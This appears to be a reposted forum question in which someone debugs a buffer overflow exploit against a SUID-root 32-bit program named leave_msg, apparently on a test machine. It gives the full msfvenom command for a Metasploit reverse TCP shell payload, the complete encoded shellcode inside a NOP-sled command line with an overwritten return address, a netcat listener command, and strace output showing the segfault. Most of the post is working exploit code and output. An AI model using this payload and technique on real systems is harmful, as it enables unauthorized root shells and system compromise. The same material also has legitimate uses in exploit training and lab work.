Saturday 7 August 2021

shell_reverse_tcp payload result in segmentation fault?

I'm trying to get a shell from exploiting a buffer overflow in a program using metasploit linux/x86/shell_reverse_tcp exploit. The buffer size and offset needed I got them using pattern_offset.rb, pattern_create.rb which says buffer size is 2060. payload is encoded using msfvenom msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 --arch x86 --platform linux -b '\x00\x0a\x09' -f c --out shellcode.txt

program run as this and result is a segmentation fault with other side running netcat. shell_reverse_tcp is second concatenation after NOP sled(\x90) in python print statement. third concatenation is the return address that will overwrite EIP.

./leave_msg $(python -c "print('\x90' * 1965 + '\xba\x0c\x05\x16\x9f\xd9\xcd\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x12\x83\xc0\x04\x31\x50\x0e\x03\x5c\x0b\xf4\x6a\x6d\xc8\x0f\x77\xde\xad\xbc\x12\xe2\xb8\xa2\x53\x84\x77\xa4\x07\x11\x38\x9a\xea\x21\x71\x9c\x0d\x49\xfd\x5e\xee\x88\x69\x5d\xee\x9f\xda\xe8\x0f\x2f\x7a\xbb\x9e\x1c\x30\x38\xa8\x43\xfb\xbf\xf8\xeb\x6a\xef\x8f\x83\x1a\xc0\x40\x31\xb2\x97\x7c\xe7\x17\x21\x63\xb7\x93\xfc\xe4' + '\xb3\xc5\xff\xff')")

Netcat output is following and run as nc -vnltp 5555:

Listening on [0.0.0.0] (family 0, port 5555)
Connection from 127.0.0.1 57212 received!

Running program with strace show that connect call is successful but after it the SIGSEGV happens these are last system calls made calls

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3
dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
connect(3, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("127.0.0.1")}, 102) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

The randomize_va_space is set to 0. The problem seems to be with payload but I dont know why it's supposed to one of the best payloads in metasploit. msfvenom output is:

Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
Saved as: shellcode.txt

Some other info are:

  1. leave_msg is 32-bit ELF file present on remote Testing machine which I connect to using SSH, also netcat was run on this remote machine. Also note that segmentation fault happens with or without strace.
  2. SUID bit of leave_msg is set and ELF file is owned by root.
  3. The shellcode was generated on my local machine on 64-bit Ubuntu.


from shell_reverse_tcp payload result in segmentation fault?
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)